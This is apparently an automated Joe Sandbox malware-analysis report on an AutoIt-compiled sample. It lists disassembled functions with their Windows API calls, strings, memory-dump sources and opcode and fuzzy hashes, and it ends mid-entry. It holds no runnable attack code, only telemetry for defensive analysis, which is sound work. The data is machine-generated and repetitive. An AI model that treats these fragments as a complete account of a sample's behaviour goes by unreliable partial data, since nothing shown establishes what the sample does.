                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$DestroyMove
                                                  • String ID: static
                                                  • API String ID: 2139405536-2160076837
                                                  • Opcode ID: 92cad383a7277ebf0ae88269921740585a72318af377ce7f6c398b3321623620
                                                  • Instruction ID: 742a21fae1e757383fb69e832315b126a74afc787f5e5df6c98dcf1e041a0c93
                                                  • Opcode Fuzzy Hash: 92cad383a7277ebf0ae88269921740585a72318af377ce7f6c398b3321623620
                                                  • Instruction Fuzzy Hash: E4316D71200608AEDB149F68CC81BFB77A9FF49760F10C629F9A9D7190DB31AD91DB60
                                                  Function 00C528A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C52911
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C5294C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: 1156e6ee16fb2636cf53e3bc41fe29833bde0b0ddc92472b07ef8bc4e6a6879f
                                                  • Instruction ID: e3416dc15af849986a96cbdd5f245a30ee7e6f2e9587f5c4c75f59d0958ef5c5
                                                  • Opcode Fuzzy Hash: 1156e6ee16fb2636cf53e3bc41fe29833bde0b0ddc92472b07ef8bc4e6a6879f
                                                  • Instruction Fuzzy Hash: 2531F57A6003059BEB24DF88D885BEEBBF8EF07351F140019EC95A62A0D7709AC8DB55
                                                  Function 00C639E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __snwprintf.LIBCMT ref: 00C63A66
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __snwprintf_memmove
                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                  • API String ID: 3506404897-2584243854
                                                  • Opcode ID: 3dd9914febf97f15ebece2b068326b6197eeab60f65979275addbfc03c55c8a3
                                                  • Instruction ID: b0e619ccd373b2b33d7494cdbe06ea63d370d4e787d10b796e25a871c27398b0
                                                  • Opcode Fuzzy Hash: 3dd9914febf97f15ebece2b068326b6197eeab60f65979275addbfc03c55c8a3
                                                  • Instruction Fuzzy Hash: 64216131A0011DABCF20EFE4CC91AAEB7F5FF45700F5044A4E655A7182DB30EA4AEB61
                                                  Function 00C766D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C76761
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C7676C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: Combobox
                                                  • API String ID: 3850602802-2096851135
                                                  • Opcode ID: 1506ee7e4f196cf090f943981e8d60c74dcd1136832bbd0e39a32b88ea059bf9
                                                  • Instruction ID: 0c52e704084ad98423f04e3c9178e9bfecc0a142c90fd88f80691f2920f1d870
                                                  • Opcode Fuzzy Hash: 1506ee7e4f196cf090f943981e8d60c74dcd1136832bbd0e39a32b88ea059bf9
                                                  • Instruction Fuzzy Hash: 5E11C475300609AFEF19CF54CC81FBB376AEB883A8F108129F92C97290D631DD5187A0
                                                  Function 00C76C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BF1D73
                                                    • Part of subcall function 00BF1D35: GetStockObject.GDI32(00000011), ref: 00BF1D87
                                                    • Part of subcall function 00BF1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF1D91
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C76C71
                                                  • GetSysColor.USER32(00000012), ref: 00C76C8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                  • String ID: static
                                                  • API String ID: 1983116058-2160076837
                                                  • Opcode ID: 86d942fb2f9cdaeb783e8eff6b7004822aa871c9408390ea3455cd69bb1b44a8
                                                  • Instruction ID: f7ad7cab4890ea7be5ea29b0acea7d24c9467cf65039b6494e9cfee9c80cb0a4
                                                  • Opcode Fuzzy Hash: 86d942fb2f9cdaeb783e8eff6b7004822aa871c9408390ea3455cd69bb1b44a8
                                                  • Instruction Fuzzy Hash: A621297261020AAFDF05DFA8CC46AFA7BB8FB08314F008669F999D3250D635E851DB60
                                                  Function 00C76920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00C769A2
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C769B1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: LengthMessageSendTextWindow
                                                  • String ID: edit
                                                  • API String ID: 2978978980-2167791130
                                                  • Opcode ID: 35164bdff1ccde88e4cdb6fbf462ba44634efbb17249f644b0582e570af5a343
                                                  • Instruction ID: e52c90fea63d1e02b1029eed09dc8f55f8e635af7b4f5e928fabe93737b078ea
                                                  • Opcode Fuzzy Hash: 35164bdff1ccde88e4cdb6fbf462ba44634efbb17249f644b0582e570af5a343
                                                  • Instruction Fuzzy Hash: BC118F71500508ABEB108E74DC81BEB37A9EB05378F508728FAB9971E0C731DC91A760
                                                  Function 00C529AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C52A22
                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C52A41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: feb10533ec94370a71abd6fb37c0ad15d9be720dba5001230aa08d35702b9ce2
                                                  • Instruction ID: b7772b08288659cd8d48c2aaae74ca8d758769e74c880f419ac3769f4ccc1f87
                                                  • Opcode Fuzzy Hash: feb10533ec94370a71abd6fb37c0ad15d9be720dba5001230aa08d35702b9ce2
                                                  • Instruction Fuzzy Hash: 6811E97AA01114ABCF35DB58EC44BAE73F8AB47301F044121EC65E7291D730AE8EE799
                                                  Function 00C621D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C6222C
                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C62255
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Internet$OpenOption
                                                  • String ID: <local>
                                                  • API String ID: 942729171-4266983199
                                                  • Opcode ID: f90ab5df88795d5e05dbf97a50a0608493dac53a75575b522372e19ae88c1367
                                                  • Instruction ID: b23e6d55be81eeecff2099b475fb53e736275d346dc7d84d7453bb036bfe9435
                                                  • Opcode Fuzzy Hash: f90ab5df88795d5e05dbf97a50a0608493dac53a75575b522372e19ae88c1367
                                                  • Instruction Fuzzy Hash: 92110670505A25BADB388F12CCD8FBBFBA8FF06361F10822AF52456000D2705A91D6F0
                                                  Function 00C48E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C4AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C4AABC
                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C48E73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 8e36481d165b9a0ddeb8091fd078dd1bfb311ffaa67f6230714dc9182b62ea57
                                                  • Instruction ID: 7dfd2eb6d59473109683f9215b6d397ac445751ae3ca73d89c2f8d915c5f6e76
                                                  • Opcode Fuzzy Hash: 8e36481d165b9a0ddeb8091fd078dd1bfb311ffaa67f6230714dc9182b62ea57
                                                  • Instruction Fuzzy Hash: AF0124B5641219ABCB14EBA4CC419FE73ACFF02320B400A69F931672E1DE31580CD660
                                                  Function 00C48CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C4AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C4AABC
                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C48D6B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 27717d8214c75cf1e1bf933c54ce40a80b8b476658aa3710a45d0977dede3cad
                                                  • Instruction ID: 8f2131271e35d2159ef90454057509a375178f71a17a84611f2b451ddc534988
                                                  • Opcode Fuzzy Hash: 27717d8214c75cf1e1bf933c54ce40a80b8b476658aa3710a45d0977dede3cad
                                                  • Instruction Fuzzy Hash: 8901D4B5A4110EABCF14EBA0CD52AFE73ACAF15300F100069B905672D1DE245E0CE671
                                                  Function 00C48D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C4AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C4AABC
                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C48DEE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 1edc5475976869a6e87555b454b2497b45109168d0497f771fe893eed821b6fd
                                                  • Instruction ID: 44c3bc88c98fa9f63a44a19b62a7c7b11b615b0863543606d0e36f863ff09634
                                                  • Opcode Fuzzy Hash: 1edc5475976869a6e87555b454b2497b45109168d0497f771fe893eed821b6fd
                                                  • Instruction Fuzzy Hash: 4701A2B1A8210AABDB25EBA4CD42AFE77ACAF11700F104465B906732D2DE254E0CE671
                                                  Function 00C54F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp
                                                  • String ID: #32770
                                                  • API String ID: 2292705959-463685578
                                                  • Opcode ID: dd7e9354fa4bc7067685a26ed337c517454d1003122e60a0defb049ea4beee2a
                                                  • Instruction ID: 99ae0193248c35592e6670634e2e2ddfb8122ad8fb05aea2f8b8c0da1ed3b814
                                                  • Opcode Fuzzy Hash: dd7e9354fa4bc7067685a26ed337c517454d1003122e60a0defb049ea4beee2a
                                                  • Instruction Fuzzy Hash: A2E09B3250022927D72096999C49BA7F7ACEB45B65F000166FD14D2051D5609A9587D0
                                                  Function 00C2B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C2B314: _memset.LIBCMT ref: 00C2B321
                                                    • Part of subcall function 00C10940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C2B2F0,?,?,?,00BF100A), ref: 00C10945
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00BF100A), ref: 00C2B2F4
                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BF100A), ref: 00C2B303
                                                  Strings
                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C2B2FE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                  • API String ID: 3158253471-631824599
                                                  • Opcode ID: aaf68f7106a6792a74bb6cecb277c28bc6c31b62e2859919e30013c6a005c0a0
                                                  • Instruction ID: 9de7cc8e2df001d6c0e2f2d3453ff252357e47a269259df5de8ca6116d8953a5
                                                  • Opcode Fuzzy Hash: aaf68f7106a6792a74bb6cecb277c28bc6c31b62e2859919e30013c6a005c0a0
                                                  • Instruction Fuzzy Hash: 19E092B02107108FDB20DF28E9483467BE4BF00314F008A7CE49AC7662EFB4D888CBA1
                                                  Function 00C47C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C47C82
                                                    • Part of subcall function 00C13358: _doexit.LIBCMT ref: 00C13362
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Message_doexit
                                                  • String ID: AutoIt$Error allocating memory.
                                                  • API String ID: 1993061046-4017498283
                                                  • Opcode ID: 57769de17685174815c99b6afd135bad56d419859f9ec8c09cd3764635af548e
                                                  • Instruction ID: a7e96891dd303a886489a842b20052249446eaa39328aa20fb8a2e9ab92d078a
                                                  • Opcode Fuzzy Hash: 57769de17685174815c99b6afd135bad56d419859f9ec8c09cd3764635af548e
                                                  • Instruction Fuzzy Hash: 53D0C23238432832D20132A56C06BDA29884F02B56F140025BF08990D34AD149C162A8
                                                  Function 00C31935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00C31775
                                                    • Part of subcall function 00C6BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00C3195E,?), ref: 00C6BFFE
                                                    • Part of subcall function 00C6BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C6C010
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C3196D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                  • String ID: WIN_XPe
                                                  • API String ID: 582185067-3257408948
                                                  • Opcode ID: a6d385ec69b82b553c361a4e6870f4baef6210bc7ee54a591e936f6650eac857
                                                  • Instruction ID: 81440ffc3b4c9138331ff521a424880e756971a883ed6d5cacc23e04e07ef3ae
                                                  • Opcode Fuzzy Hash: a6d385ec69b82b553c361a4e6870f4baef6210bc7ee54a591e936f6650eac857
                                                  • Instruction Fuzzy Hash: 8CF0A570814109DFDB15DB91C9C8BECBBF8AB09301F580095E516A61A0D7758F85DF61
                                                  Function 00C75998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C759AE
                                                  • PostMessageW.USER32(00000000), ref: 00C759B5
                                                    • Part of subcall function 00C55244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C552BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: 1432fab1bee9cffdb2a0873ad44fdd2d16774ca4034745512ec3ec22e4cd18d9
                                                  • Instruction ID: 235bafb16d86b559dfbc883d6689d648879cd3e61de9fe67ed00490c3e701282
                                                  • Opcode Fuzzy Hash: 1432fab1bee9cffdb2a0873ad44fdd2d16774ca4034745512ec3ec22e4cd18d9
                                                  • Instruction Fuzzy Hash: 75D0C931784311BBE7A4BB709C4BF9A6A14BB05B51F000839B649AA1D0D9E0A845C758
                                                  Function 00C75964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C7596E
                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C75981
                                                    • Part of subcall function 00C55244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C552BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
